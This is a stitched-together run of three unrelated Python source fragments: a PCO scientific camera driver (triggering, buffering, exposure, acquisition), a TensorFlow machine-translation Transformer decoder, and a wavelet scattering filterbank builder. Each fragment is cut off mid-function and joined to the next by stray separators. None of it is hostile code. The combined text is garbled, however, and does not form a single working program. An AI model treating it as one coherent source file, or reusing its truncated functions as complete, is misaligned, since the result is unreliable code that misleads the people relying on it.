"symm_hor_roi","cooling_setp"]
def get_capabilities(self):
"""
Get camera capabilities.
For description of the capabilities, see PCO SC2 manual.
"""
caps=self.v["sensor/strDescription/dwGeneralCapsDESC1"]
return self._parse_flag_bits(caps,self._caps_desc1)
def _has_option(self, option):
return option in self._capabilities
def _check_option(self, option, value=True):
has_option=self._has_option(option)
if has_option!=value:
raise PCOSC2NotSupportedError("option {} is not supported by {}".format(option,self.get_model_data().model))
return has_option
def _is_pco_edge(self):
return (self.v["general/strCamType/wCamType"]&0xFF00)==0x1300
def _is_camlink(self):
return self.v["general/strCamType/wInterfaceType"] in [2,7] # CL and CLHS
### Generic controls ###
def _apply_timebase(self, value, timebase):
return value*[1E-9,1E-6,1E-3][timebase]
def _extract_timebase(self, value):
if value<1.:
return (int(value*1E9),0)
elif value<1E3:
return (int(value*1E6),1)
else:
return (int(value*1E3),2)
_status_bits=[ "default_state","settings_valid","recording_on","readout_on",
"frame_rate_dominant","stop_triggered","ext_sync_locked","battery_on",
"power_save_on","power_save_left","irig_locked"]
_warning_bits=["power_supply_voltage","power_supply_temp","camera_temp","sensor_temp","battery","offset_reg"]
_error_bits=["power_supply_voltage","power_supply_temp","camera_temp","sensor_temp","battery",("interface",0x10000),"ram_module","main_board","head_board"]
CameraStatus=collections.namedtuple("CameraStatus",["status","warnings","errors"])
def get_status(self, full=False):
"""
Get camera status.
If ``full==True``, return current camera status as a set of enabled status states;
otherwise, return tuple ``(status, warnings, errors)`` with additional information about warnings and error.
"""
warn,err,stat=lib.PCO_GetCameraHealthStatus(self.handle)
if full:
return self.CameraStatus(self._parse_flag_bits(stat,self._status_bits),self._parse_flag_bits(warn,self._warning_bits),self._parse_flag_bits(err,self._error_bits))
else:
return self._parse_flag_bits(stat,self._status_bits)
def get_temperature(self):
"""
Get the current camera temperature
Return tuple ``(CCD, cam, power)`` with temperatures of the sensor, camera, and power supply respectively.
"""
temp=lib.PCO_GetTemperature(self.handle)
return (temp.ccd/10.,temp.cam,temp.pow)
def get_conversion_factor(self):
"""Get camera conversion factor (electrons per pixel value)"""
return lib.PCO_GetConversionFactor(self.handle)/100.
### Trigger controls ###
_trigger_modes={"int":0,"soft":1,"ext":2,"ext_exp":3,"ext_sync":4,"ext_exp_fast":5,"ext_cds":6,"ext_exp_slow":7,"ext_sync_hdsdi":0x102}
_trigger_modes_inv=general.invert_dict(_trigger_modes)
def get_trigger_mode(self):
"""Get current trigger mode (see :meth:`set_trigger_mode` for description)"""
mode=lib.PCO_GetTriggerMode(self.handle)
return self._trigger_modes_inv[mode]
def set_trigger_mode(self, mode):
"""
Set trigger mode.
Can be ``"int"`` (internal), ``"soft"`` (software), ``"ext"`` (external+software), ``"ext_exp"`` (external exposure), ``"ext_sync"`` (external PLL sync),
``"ext_exp_fast"`` (fast external exposure), ``"ext_cds"`` (external CDS control),
``"ext_exp_slow"`` (slow external exposure)`, or ``"ext_sync_hdsdi"`` (external synchronized SD/HDI).
For description, see PCO SDK manual.
"""
funcargparse.check_parameter_range(mode,"mode",self._trigger_modes.keys())
lib.PCO_SetTriggerMode(self.handle,self._trigger_modes[mode])
self._arm()
return self.get_trigger_mode()
def send_software_trigger(self):
"""Send software trigger signal"""
return bool(lib.PCO_ForceTrigger(self.handle))
### Acquisition controls ###
class Buffer(object):
"""Single frame buffer object, which controls setup, cleanup, and synchronization"""
def __init__(self, size, metadata_size=0):
object.__init__(self)
self.buff=ctypes.create_string_buffer(size)
self.event=lib.CreateEvent()
self.size=size
self.status=PCO_SC2_lib.DWORD()
self.metadata_size=metadata_size
self.lock=threading.Lock()
def wait(self, timeout):
if not self.lock.acquire(timeout=(-1 if timeout is None else timeout)):
return False
wait_res=lib.WaitForSingleObject(self.event,(-1 if timeout is None else np.int(timeout*1000)))==0
self.lock.release()
return wait_res
def reset(self):
with self.lock:
lib.ResetEvent(self.event)
def release(self):
if self.buff is not None:
lib.CloseHandle(self.event)
self.buff=None
self.event=None
def _allocate_buffers(self, n):
self.stop_acquisition()
frame_size,metadata_size=self._get_buffer_size()
self._buffers=[self.Buffer(frame_size+metadata_size,metadata_size=metadata_size) for _ in range(n)]
self._next_wait_buffer=0
self._next_read_buffer=0
self._next_schedule_buffer=0
self._last_wait_frame=0
return n
def _schedule_buffer(self, buff):
lib.PCO_AddBufferExtern(self.handle,buff.event,0,0,0,0,buff.buff,buff.size,ctypes.byref(buff.status))
def _schedule_all_buffers(self, n=None):
if self._buffers:
if n is None:
n=min(len(self._buffers),32)
for b in self._buffers[:n]:
self._schedule_buffer(b)
self._next_schedule_buffer+=1
def _unschedule_all_buffers(self):
if self._buffers:
lib.PCO_CancelImages(self.handle)
def _deallocate_buffers(self):
if self._buffers is not None:
for b in self._buffers:
b.release()
self._buffers=None
def _loop_schedule_refresh_buffers(self):
nbuff=len(self._buffers)
nsched=min(nbuff,32)
while self._buffer_looping:
actioned=False
if self._next_wait_buffer<self._next_schedule_buffer: # scheduled buffers available
buff=self._buffers[self._next_wait_buffer%nbuff]
succ=buff.wait(timeout=0.001)
if succ:
self._next_wait_buffer+=1
actioned=True
if self._next_schedule_buffer<self._next_wait_buffer+nsched and self._next_schedule_buffer<self._next_read_buffer+nbuff: # more scheduling space and buffer space
buff=self._buffers[self._next_schedule_buffer%nbuff]
buff.reset()
self._schedule_buffer(buff)
self._next_schedule_buffer+=1
actioned=True
if not actioned:
time.sleep(0.001)
def _stop_reading_loop(self):
if self._buffer_loop_thread is not None:
self._buffer_looping=False
self._buffer_loop_thread.join()
self._buffer_loop_thread=None
def _start_reading_loop(self):
self._stop_reading_loop()
self._buffer_loop_thread=threading.Thread(target=self._loop_schedule_refresh_buffers,daemon=True)
self._buffer_looping=True
self._buffer_loop_thread.start()
def _read_next_buffer(self, npx=None):
if self._buffers is None or self._next_read_buffer>=self._next_wait_buffer:
return None
buff=self._buffers[self._next_read_buffer%len(self._buffers)]
if npx is None:
npx=len(buff.buff)//2
frame=np.frombuffer(buff.buff,dtype="<u2",count=npx).copy()
metadata=buff.buff[-buff.metadata_size:] if buff.metadata_size>0 else None
self._next_read_buffer+=1
return frame,metadata
def _wait_for_next_buffer(self, timeout=None):
if self._buffers is None:
return False
if self._next_wait_buffer>self._next_read_buffer:
return True
buff=self._buffers[self._next_read_buffer%len(self._buffers)]
return buff.wait(timeout)
AcqTimes=collections.namedtuple("AcqTimes",["exposure","frame_delay","frame_time"])
def get_timings(self):
"""
Get acquisition timing.
Return tuple ``(exposure, frame_delay, frame_time)``.
"""
timings=lib.PCO_GetImageTiming(self.handle)
exp=timings.ExposureTime_s+timings.ExposureTime_ns*1E-9
frame_delay=timings.TriggerDelay_s+timings.TriggerDelay_ns*1E-9
frame_time=timings.FrameTime_s+timings.FrameTime_ns*1E-9
return self.AcqTimes(exp,frame_delay,frame_time)
def _set_exposure_delay(self, exposure, frame_delay):
exposure=max(exposure,self.v["sensor/strDescription/dwMinExposureDESC"]*1E-9)
exposure=min(exposure,self.v["sensor/strDescription/dwMaxExposureDESC"]*1E-3)
frame_delay=max(frame_delay,self.v["sensor/strDescription/dwMinDelayDESC"]*1E-9)
frame_delay=min(frame_delay,self.v["sensor/strDescription/dwMaxDelayDESC"]*1E-3)
ev,eb=self._extract_timebase(exposure)
dv,db=self._extract_timebase(frame_delay)
lib.PCO_SetDelayExposureTime(self.handle,dv,ev,db,eb)
self._arm()
def set_exposure(self, exposure):
"""Set camera exposure"""
self._set_exposure_delay(exposure,self.get_frame_delay())
return self.get_exposure()
def get_exposure(self):
"""Get current exposure"""
return self.get_timings().exposure
def set_frame_delay(self, frame_delay):
"""Set camera frame delay"""
self._set_exposure_delay(self.get_exposure(),frame_delay)
return self.get_frame_delay()
def get_frame_delay(self):
"""Get current frame delay"""
return self.get_timings().frame_delay
def set_frame_time(self, frame_time=0, adjust_exposure=False):
"""
Set frame time (frame acquisition period).
If the time can't be achieved even with zero frame delay and ``adjust_exposure==True``, try to reduce the exposure to get the desired frame time;
otherwise, keep the exposure the same.
"""
exposure,frame_delay,curr_frame_time=self.get_timings()
if curr_frame_time-frame_delay<=frame_time:
frame_delay=frame_delay+frame_time-curr_frame_time
else:
frame_delay=0
if adjust_exposure:
exposure=max(0,frame_delay+frame_time-curr_frame_time+exposure)
self._set_exposure_delay(exposure,frame_delay)
return self.get_frame_time()
def get_frame_time(self):
"""Get current frame time (frame acquisition period)"""
return self.get_timings().frame_time
def get_pixel_rate(self):
"""Get camera pixel rate (in Hz)"""
return lib.PCO_GetPixelRate(self.handle)
def get_available_pixel_rates(self):
"""Get all available pixel rates"""
rates=self.v["sensor/strDescription/dwPixelRateDESC"]
rlist=[rates[k] for k in rates if rates[k]>0]
return sorted(rlist)
def set_pixel_rate(self, rate=None):
"""
Set camera pixel rate (in Hz)
The rate is always rounded to the closest available.
If `rate` is ``None``, set the maximal possible rate.
"""
rates=self.get_available_pixel_rates()
if rate is None:
rate=rates[-1]
else:
rate=sorted(rates,key=lambda r: abs(r-rate))[0]
lib.PCO_SetPixelRate(self.handle,rate)
if self.v["general/strCamType/wCamType"]==0x1300: # pco.edge 5.5 CL
lib.PCO_SetTransferParametersAuto(self.handle)
self._arm()
return self.get_pixel_rate()
### Acquisition process controls ###
def start_acquisition(self, buffn=None):
"""
Start camera acquisition.
`buffn` specifies number of frames in the ring buffer (automatically capped at 32, which is the SDK limit)
"""
self.stop_acquisition()
self._allocate_buffers(n=buffn or self._default_nframes)
self._arm()
if self._is_pco_edge() and self._is_camlink():
self._schedule_all_buffers()
self._start_reading_loop()
lib.PCO_SetRecordingState(self.handle,1)
else:
lib.PCO_SetRecordingState(self.handle,1)
self._schedule_all_buffers()
self._start_reading_loop()
def stop_acquisition(self):
"""
Stop acquisition.
Clears buffers as well, so any readout after acquisition stop is impossible.
"""
self._stop_reading_loop()
self._unschedule_all_buffers()
lib.PCO_SetRecordingState(self.handle,0)
self._deallocate_buffers()
def acquisition_in_progress(self):
"""Check if the acquisition is in progress"""
return bool(lib.PCO_GetRecordingState(self.handle))
def wait_for_frame(self, since="lastread", timeout=20., period=1E-3):
"""
Wait for a new camera frame.
`since` specifies what constitutes a new frame.
Can be ``"lastread"`` (wait for a new frame after the last read frame), ``"lastwait"`` (wait for a new frame after last :meth:`wait_for_frame` call),
or ``"now"`` (wait for a new frame acquired after this function call).
If `timeout` is exceeded, raise :exc:`.PCOSC2TimeoutError`.
`period` specifies camera polling period.
"""
if not self.acquisition_in_progress():
return
last_acq_frame=self._next_wait_buffer-1
last_read_frame=self._next_read_buffer-1
if since=="lastread" and last_acq_frame>last_read_frame:
self._last_wait_frame=last_acq_frame
return
if since=="lastwait" and last_acq_frame>self._last_wait_frame:
self._last_wait_frame=last_acq_frame
return
ctd=general.Countdown(timeout)
while not ctd.passed():
new_valid=self._next_wait_buffer>self._next_read_buffer
if new_valid:
break
time.sleep(0.001)
if not | |
states: A `.NestedMap` of tensors representing states that the clients
would like to keep track of for each of the active hyps.
num_hyps_per_beam: Beam size.
Returns:
A tuple (results, out_states).
results: A `.NestedMap` of beam search results.
atten_probs:
The updated attention probs, of shape [tgt_batch, src_len].
log_probs:
Log prob for each of the tokens in the target vocab. This is of shape
[tgt_batch, vocab_size].
out_states: A `.NestedMap`. The updated states.
rnn_states:
Last state of the RNN.
atten_context:
Updated attention context vector.
atten_states:
Updates attention states.
"""
p = self.params
prev_rnn_states = states['rnn_states']
prev_atten_context = states['atten_context']
prev_atten_probs = states['atten_probs']
prev_atten_states = states['atten_states']
step_paddings = tf.zeros(py_utils.GetShape(step_ids), dtype=p.dtype)
embs = self.emb.EmbLookup(theta.emb, tf.reshape(step_ids, [-1]))
embs = self.ApplyClipping(theta, embs)
atten_context, atten_probs, rnn_states, step_out, atten_states = (
self._DecodeStep(theta, encoder_outputs, embs, step_paddings,
prev_atten_context, prev_rnn_states,
prev_atten_states))
atten_probs = tf.reshape(atten_probs, tf.shape(prev_atten_probs))
logits = self.softmax.Logits(theta.softmax, [step_out])
log_probs = self.fns.qlogsoftmax(
logits, qmin=p.qlogsoftmax_range_min, qmax=0.0)
if p.use_prev_atten_ctx:
cur_atten_probs = prev_atten_probs
else:
cur_atten_probs = atten_probs
bs_results = py_utils.NestedMap({
'atten_probs': cur_atten_probs, # the probs exposed to beam search
'log_probs': log_probs,
})
new_states = py_utils.NestedMap({
'time_step': states.time_step + 1,
'rnn_states': rnn_states,
'atten_context': atten_context,
'atten_probs': atten_probs, # the updated attention probs
'atten_states': atten_states,
})
return bs_results, new_states
def _PostBeamSearchStepCallback(self, theta, encoder_outputs, new_step_ids,
states):
# There is nothing to do here.
return states
class TransformerDecoder(MTBaseDecoder):
"""Transformer decoder.
Implements the decoder of Transformer model:
https://arxiv.org/abs/1706.03762.
"""
@classmethod
def Params(cls):
p = super(TransformerDecoder, cls).Params()
p.Define('token_emb', layers.EmbeddingLayer.Params(),
'Token embedding layer params.')
p.Define('position_emb', layers.PositionalEmbeddingLayer.Params(),
'Position embedding layer params.')
p.Define('source_dim', 1024, 'Dimension of encoder outputs.')
p.Define('model_dim', 1024, 'Model dimension that applies to embedding '
'layers and all Transformer layers.')
p.Define('num_trans_layers', 6, 'Number of Transformer layers.')
p.Define(
'trans_tpl', layers_with_attention.TransformerLayer.Params(),
'Transformer layer params. '
' Can be a list. num_trans_layers should be divisible by '
'len(trans_tpl).')
p.Define('input_dropout_prob', 0.0, 'Prob at which we do input dropout.')
p.Define(
'is_transparent', False, 'If set, expects a tensor of shape '
'[time, batch, source_dim, num_trans_layers] as source encodings.')
p.Define(
'add_multiheaded_attention_scalar_summary', False,
'If set, will include scalar summaries for multi-headed attention'
' to visualize the sparsity statistics of attention weights.')
# TODO(miachen): Extend this to more general logic of adding multiple
# embedding fields.
p.Define('task_emb', None, 'Task embedding layer params.')
p.Define('init_step_ids', False,
'Initializes beam search with first target id instead of <s>.')
# MASS pretraining related (https://github.com/microsoft/MASS)
p.Define(
'use_lang_dependent_atten', False, 'If True, attention between '
'encoder and decoder is language dependent.')
# Default config for the token embedding.
p.token_emb.vocab_size = 32000
p.token_emb.embedding_dim = p.model_dim
p.token_emb.max_num_shards = 16
p.token_emb.params_init = py_utils.WeightInit.Gaussian(
1.0 / math.sqrt(p.token_emb.embedding_dim))
p.token_emb.scale_sqrt_depth = True
# Default config for the position embedding.
p.position_emb.embedding_dim = p.model_dim
# Default config for the transformer layers.
p.trans_tpl.source_dim = p.model_dim
p.trans_tpl.tr_atten_tpl.source_dim = p.model_dim
p.trans_tpl.tr_atten_tpl.num_attention_heads = 8
p.trans_tpl.tr_fflayer_tpl.input_dim = p.model_dim
p.trans_tpl.tr_fflayer_tpl.hidden_dim = 2048
# Default config for beam search.
p.target_seq_len = 300
p.beam_search.length_normalization = 0.5
p.beam_search.coverage_penalty = 0.0
p.beam_search.batch_major_state = False
return p
@base_layer.initializer
def __init__(self, params):
super(TransformerDecoder, self).__init__(params)
p = self.params
if p.softmax.cls == layers.SharedSoftmaxLayer:
self._token_emb_vocab_size = p.softmax.num_classes
self._token_emb_dim = p.model_dim
self._share_sm_emb = True
else:
self._token_emb_vocab_size = p.token_emb.vocab_size
self._token_emb_dim = p.token_emb.embedding_dim
self._share_sm_emb = False
assert self._token_emb_vocab_size == p.softmax.num_classes
assert self._token_emb_dim == p.position_emb.embedding_dim
if p.model_dim != self._token_emb_dim:
tf.logging.warning('token_emb.embedding_dim != model_dim (%s vs. %s), '
'creating a projection!')
proj_p = layers.ProjectionLayer.Params().Copy()
proj_p.name = 'emb_proj'
proj_p.input_dim = p.token_emb.embedding_dim
proj_p.output_dim = p.model_dim
self.CreateChild('emb_proj', proj_p)
if p.use_lang_dependent_atten and p.task_emb:
p.trans_tpl.num_aux_atten_post_proj = p.task_emb.vocab_size
p.softmax.input_dim = p.model_dim
if self._share_sm_emb:
# Taking shared emb/softmax layer out of the decoder variable scope so
# that it can also be shared by encoder if needed.
with tf.variable_scope('shared_emb', reuse=tf.AUTO_REUSE):
self.CreateChild('softmax', p.softmax)
with tf.variable_scope(p.name):
if not self._share_sm_emb:
self.CreateChild('token_emb', p.token_emb)
self.CreateChild('position_emb', p.position_emb)
if p.task_emb:
assert p.task_emb.embedding_dim == self._token_emb_dim
self.CreateChild('task_emb', p.task_emb)
dropout_tpl = layers.DropoutLayer.Params()
dropout_tpl.keep_prob = (1.0 - p.input_dropout_prob)
self.CreateChild('input_dropout', dropout_tpl)
params_trans_layers = []
denom = 1
if isinstance(p.trans_tpl, list):
denom = len(p.trans_tpl)
assert p.num_trans_layers % denom == 0
for i in range(p.num_trans_layers // denom):
if isinstance(p.trans_tpl, list):
for q in p.trans_tpl:
params = q.Copy()
params_trans_layers.append(params)
else:
params = p.trans_tpl.Copy()
params_trans_layers.append(params)
for i, params in enumerate(params_trans_layers):
params.name = 'trans_layer_%d' % i
params.packed_input = p.packed_input
params.has_aux_atten = True
params.mask_self_atten = True
self.CreateChildren('trans', params_trans_layers)
if not self._share_sm_emb:
self.CreateChild('softmax', p.softmax)
def _ExpandToNumHyps(self, source_enc_len, num_hyps_per_beam):
"""Repeat each value according to num hyps.
Args:
source_enc_len: source encoder length; int [batch].
num_hyps_per_beam: number of hypotheses
Returns:
New version of source_enc_len; int [batch * num_hyps_per_beam].
Target_batch is (num_hyps_per_beam * batch).
Example: src_enc_len = [3, 2, 1] and num_hyps_per_beam = 2
--> [3, 2, 1, 3, 2, 1]
"""
x = tf.tile(input=source_enc_len, multiples=[num_hyps_per_beam])
return x
def _RemoveEOSProbs(self, p, probs, source_enc_len):
"""Remove the attention probs on EOS symbol and renormalize.
Args:
p: decoder params.
probs: attention probs matrix; float [batch, target_len, source_len].
source_enc_len: source encoder length; int [batch].
Returns:
probs with value on last actual token (EOS token) replaced by 0 and
renormalized so that final dim (src_len) sums to 1 again; float
[batch, target_len, source_len].
"""
batch = py_utils.GetShape(probs)[0]
source_enc_len = py_utils.HasShape(source_enc_len, [batch])
# Set -1 values
target_len = py_utils.GetShape(probs)[1]
replacements = tf.ones([py_utils.GetShape(probs)[0], target_len],
dtype=py_utils.FPropDtype(p)) * (-1)
index_0 = tf.reshape(tf.range(batch), shape=[batch, 1, 1])
index_0 *= tf.ones(shape=[batch, target_len, 1], dtype=tf.int32)
index_1 = tf.ones(shape=[batch, 1], dtype=tf.int32)
index_1 *= tf.expand_dims(tf.range(target_len), 0)
index_1 = tf.expand_dims(index_1, -1)
index_2 = tf.reshape(source_enc_len, shape=[batch, 1, 1]) - 1 # Note the -1
index_2 = tf.cast(index_2, tf.int32)
index_2 *= tf.ones(shape=[batch, target_len, 1], dtype=tf.int32)
index = tf.concat([index_0, index_1, index_2], axis=2)
# Original update matrix contained -1 values. Change all to 1 except for
# those positions coming from scatter which will be 0.
updates = tf.scatter_nd(
index, updates=replacements, shape=py_utils.GetShape(probs))
updates += 1
res = probs * updates
# Normalize to that probs sum to 1.
# Add eps to sum to deal with case where all probs except last one are 0.
# In this case then, attention probs will not sum to 1 but this seems still
# better then evenly distributing attention probs in this case.
s = tf.reduce_sum(res, axis=2, keepdims=True)
epsilon = tf.constant(value=1e-6, dtype=py_utils.FPropDtype(p))
s += epsilon
res /= s
return res
def _FProp(self, theta, encoder_outputs, targets):
"""Decodes `targets` given encoded source.
Args:
theta: A `.NestedMap` object containing weights' values of this layer and
its children layers.
encoder_outputs: a NestedMap computed by encoder. Expected to contain:
encoded - source encoding. When `p.is_transparent` is False, it is a
tensor of shape [time, batch, depth]. When `p.is_transparent`
is True, it is a tensor of shape
[time, batch, depth, num_trans_layers] if `self.do_eval` is
True, and a list of `num_trans_layers` tensors of shape
[time, batch, depth] if `self.do_eval` is False.
padding - source encoding's padding, of shape [time, batch].
segment_id - source segment id, of shape [time, batch].
targets: A dict of string to tensors representing the targets one try to
predict. Each tensor in targets is of shape [batch, time].
Returns:
A `.NestedMap` containing output of last decoder layer and attention probs
- softmax_input: Tensor of shape [time, batch, params.softmax.input_dim].
- attention: `.NestedMap` of attention distributions of shape
[batch, target_length, source_length].
"""
p = self.params
source_encs = encoder_outputs.encoded
source_paddings = encoder_outputs.padding
src_segment_id = getattr(encoder_outputs, 'segment_id', None)
time, batch = py_utils.GetShape(source_paddings, 2)
if p.is_transparent:
if self.do_eval:
source_encs = py_utils.HasShape(
source_encs, [time, batch, p.source_dim, p.num_trans_layers])
source_encs = tf.unstack(source_encs, axis=3)
else:
assert isinstance(source_encs, list)
assert len(source_encs) == p.num_trans_layers
for i in range(p.num_trans_layers):
source_encs[i] = py_utils.HasShape(source_encs[i],
[time, batch, p.source_dim])
else:
source_encs = py_utils.HasShape(source_encs, [time, batch, p.source_dim])
source_encs = [source_encs] * p.num_trans_layers
with tf.name_scope(p.name):
# [batch, time]
target_ids = targets.ids
# [time, batch]
target_paddings = tf.transpose(targets.paddings)
target_segment_pos = None
target_segment_id = None
if p.packed_input:
target_segment_id = tf.transpose(targets.segment_ids)
target_segment_pos = targets.segment_pos
assert src_segment_id is not None, ('Need to provide src_segment_id '
'for packed input.')
# Embedding layer
# [batch, time, model_dim]
if not self._share_sm_emb:
token_embs = self.token_emb.EmbLookup(theta.token_emb, target_ids)
else:
token_embs = self.softmax.EmbLookup(theta.softmax, target_ids)
target_time = py_utils.GetShape(target_ids)[1]
# [1, time, model_dim]
if p.packed_input:
posit_embs = self.position_emb.FPropWithPosition(
theta.position_emb, target_segment_pos)
else:
posit_embs = tf.expand_dims(
self.position_emb.FProp(theta.position_emb, target_time), 0)
# [time, batch, model_dim]
input_embs = token_embs + posit_embs
atten_idx = None
if p.task_emb:
if p.use_lang_dependent_atten:
atten_idx = targets.task_ids
# | |
not sufficing) is ruled out by later assertion, `pads_built`.
# Frontend also assures this in `compute_padding_fr`, and/or via
# `scale_diff_max_to_build`
repeat_last_built_id(scale_diff, scale_diff_last_built)
continue
elif (scale_diff_max_to_build is not None and
scale_diff > scale_diff_max_to_build):
assert scale_diff not in j1_frs, j1_frs
# ensure `scale_diff` didn't exceed a global maximum.
# subsequent `scale_diff` are only greater, so
# we could `break`, but still need to `repeat_last_built_id`
repeat_last_built_id(scale_diff, scale_diff_last_built)
continue
# extract params to iterate
n_psi = len(j1_frs[scale_diff])
params = []
for n1_fr in range(n_psi):
xi = xi1_frs[ scale_diff][n1_fr]
sigma = sigma1_frs[scale_diff][n1_fr]
padded_len = 2**J_pad_frs[scale_diff] # repeat for all n1_fr
params.append((xi, sigma, padded_len))
# if already built, point to it and don't rebuild
if params in params_built:
repeat_last_built_id(scale_diff, scale_diff_last_built)
continue
# build wavelets #####################################################
psis_up = []
for n1_fr in range(n_psi):
# ensure we compute at valid `N_fr_scale`, `n1_fr`
if first_scale:
# always built
pass
elif (sampling_psi_fr == 'exclude' and
# this means the wavelet (sampled at J_pad_frs_max_init)
# exceeded max permitted width at this scale,
# i.e. `width > 2**N_fr_scale`
(scale_diff not in j1_frs or
n1_fr > len(j1_frs[scale_diff]) - 1)):
# subsequent `scale_diff` are only greater, and
# hence `len(j1_frs[scale_diff])` only lesser
# above conditional shouldn't be possible to satisfy but is
# kept for clarity
raise Exception("impossible iteration")
break # would happen if condition was met; kept for clarity
#### Compute wavelet #############################################
# fetch wavelet params, sample wavelet
xi, sigma, padded_len = params[n1_fr]
# expand dim to multiply along freq like (2, 32, 4) * (32, 1)
psi = morlet_1d(padded_len, xi, sigma, normalize=normalize_fr,
P_max=P_max, eps=eps)[:, None]
psis_up.append(psi)
# if all `n1_fr` built, register & append to filterbank ##############
if first_scale:
psi_ids[0] = 0
else:
psi_ids[scale_diff] = psi_ids[scale_diff_last_built] + 1
params_built.append(params)
scale_diff_last_built = scale_diff
# append to filterbank
psi_id = psi_ids[scale_diff]
psi1_f_fr_up[psi_id] = psis_up
# compute spin down by time-reversing spin up in frequency domain
psi1_f_fr_dn[psi_id] = [time_reverse_fr(p) for p in psis_up]
##########################################################################
# ensure every unique `N_fr_scale` has a filterbank
n_scales = len(N_fr_scales_unique)
assert len(psi_ids) == n_scales, (psi_ids, N_fr_scales_unique)
# validate `scale_diff_max_to_build`
if scale_diff_max_to_build is not None:
assert scale_diff_last_built <= scale_diff_max_to_build
# guaranteed by "J_pad_frs is non-increasing", which was already asserted
# in `compute_padding_fr()` (base_frontend), but include here for clarity;
# much of above logic assumes this
pads_built = [math.log2(params[0][2]) for params in params_built]
assert min(pads_built) == J_pad_frs[scale_diff_last_built], (
pads_built, J_pad_frs)
# assert "higher psi_id -> lower scale"
# since `params, J_pad_fr = psi_ids_fn(scale_diff)`,
# and `params` and `J_pad_fr` are always same for same `scale_diff`,
# then `params` or `J_pad_fr` (and hence `psi_id`) only change if
# `scale_diff` changes. Namely,
# - if `psi_id` changed, then either `params` or `J_pad_fr` changed
# (which can only happen if `scale_diff` changed),
# - if `scale_diff` changed, then `psi_id` doesn't necessarily change,
# since neither of `params` or `J_pad_fr` necessarily change.
# Thus, "psi_id changed => scale_diff changed", but not conversely.
prev_scale_diff, prev_psi_id = -1, -1
for scale_diff in psi_ids:
if psi_id == prev_psi_id:
# only check against changing `psi_id`, but still track `scale_diff`
prev_scale_diff = scale_diff
continue
assert scale_diff > prev_scale_diff, (scale_diff, prev_scale_diff)
prev_scale_diff, prev_psi_id = scale_diff, psi_id
# instantiate for-later params and reusable kwargs
ca = dict(criterion_amplitude=criterion_amplitude)
s0ca = dict(criterion_amplitude=criterion_amplitude, sigma0=sigma0)
# Embed meta information within the filters
for psi_f in (psi1_f_fr_dn, psi1_f_fr_up):
for field in ('xi', 'sigma', 'j', 'is_cqt', 'support', 'width'):
if field not in psi_f:
psi_f[field] = {}
for scale_diff, psi_id in psi_ids.items():
if psi_id in psi_f[field]:
continue
psi_f[field][psi_id] = []
for n1_fr in range(len(psi_f[psi_id])):
if field == 'support':
p = 2 * compute_temporal_support(
psi_f[psi_id][n1_fr], **ca)
elif field == 'width':
N_fr_scale = N_fr_scales_max - scale_diff
p = 2 * compute_temporal_width(
psi_f[psi_id][n1_fr], N=2**N_fr_scale, **s0ca)
else:
p = psi_fr_params[scale_diff][field][n1_fr]
psi_f[field][psi_id].append(p)
# return results
return psi1_f_fr_up, psi1_f_fr_dn, psi_ids
def phi_fr_factory(J_pad_frs_max_init, J_pad_frs, F, log2_F, unrestricted_pad_fr,
pad_mode_fr, sampling_phi_fr='resample', average_fr=None,
average_fr_global_phi=None, aligned=None,
criterion_amplitude=1e-3, normalize_fr='l1', sigma0=0.1,
P_max=5, eps=1e-7):
"""
Builds in Fourier the lowpass Gabor filters used for JTFS.
Every filter is provided as a dictionary with the following keys:
* 'xi': central frequency, always 0 for low-pass filters.
* 'sigma': frequency-domain width, as passed to the function being sampled
* 'j': subsampling factor from 0 to `log2_F` (or potentially less if
`sampling_phi_fr = 'recalibrate'`).
* 'width': temporal width (scale; interval of imposed invariance)
* 'support': temporal support (duration of decay)
Parameters
----------
J_pad_frs_max_init : int
`2**J_pad_frs_max_init` is the largest length of the filters.
J_pad_frs : dict[int: int]
Lengths at which to sample `gauss_1d`. For 'recalibrate', also
controls time-domain widths (see "Build logic").
F : int
Scale of invariance (in linear units). Controls `sigma` of `phi`
via `sigma0 / F`. For 'recalibrate', `log2_F_phi_diff` means
`sigma0 / F / 2**log2_F_phi_diff` (see "Build logic").
log2_F : int
Scale of invariance (log2(prevpow2(F))). Controls maximum dyadic scale
and subsampling factor for all `phi`.
unrestricted_pad_fr : bool
Used for a quality check; `True` ensures `phi` decays sufficiently
(but not necessarily fully if `pad_mode_fr=='zero'`; see code).
Including steps outside this function, `max_pad_factor != None`
such filter distortion considerations.
pad_mode_fr : str
Used for a quality check.
sampling_phi_fr : str['resample', 'recalibrate']
See "Build logic" below.
average_fr : bool
Used for a sanity check.
average_fr_global_phi : bool
Used for a quality check.
aligned : bool
Used for a sanity check.
criterion_amplitude : float
Used to compute `phi` meta.
sigma0 : float
Together with `F`, determines width (sigma) of `phi`: `sigma = sigma0/F`.
normalize_fr : str
`gauss_1d` parameter `normalize`.
P_max, eps : float, float
`gauss_1d` parameters.
Returns
-------
phi_f_fr : dict[int: dict[int: list[tensor[float]]],
str: dict[int: dict[int: list[int]], float]]
Contains the low-pass filter at all possible lengths, scales of
invariance, and subsampling factors:
phi_f_fr[invariance_scale][input_length][input_subsampling]
<= e.g. =>
phi_f_fr[~log2_F][~J_pad_fr_max][n1_fr_subsample]
and corresponding meta:
phi_f_fr['support'][log2_F_phi_diff][pad_diff][n1_fr_subsample]
phi_f_fr['sigma'][log2_F_phi_diff'] # doesn't vary w/ other params
This differs from `Scattering1D.phi_f`. See "Build logic" for details.
Build logic
-----------
We build `phi` for every possible input length (`2**J_pad_fr`), input
subsampling factor (`n1_fr_subsample1`), and ('recalibrate' only) scale
of invariance. Structured as
`phi_f_fr[log2_F_phi_diff][pad_diff][sub]`
`log2_F_diff == log2_F - log2_F_phi`. Hence,
higher `log2_F_phi_diff`
<=>
greater *contraction* (time-domain) of original phi
<=>
lower `log2_F_phi`, lower permitted max subsampling
Higher `pad_diff` is a greater *trimming* (time-domain) of the corresponding
lowpass.
- 'resample': `log2_F_diff == 0`, always.
- 'recalibrate': `log2_F_diff` spans from `min(log2_F, J_pad_fr)` to
`log2_F`. Not all of these will be used, but we compute every possible
combination to avoid figuring out which will be.
'resample' enforces global scale of invariance (`==F` for all coefficients).
'recalibrate' "follows" the scale of `psi`, as controlled by
`total_conv_stride_over_U1`, averaging less for finer filterbanks.
"""
# compute the spectral parameters of the filters
sigma_low = sigma0 / F
N_init = 2**J_pad_frs_max_init
zero_stride_globally = bool(not average_fr and aligned)
def compute_all_subsamplings(phi_f_fr, pad_diff, log2_F_phi, log2_F_phi_diff):
for sub in range(1, 1 + log2_F_phi):
phi_f_fr[log2_F_phi_diff][pad_diff].append(
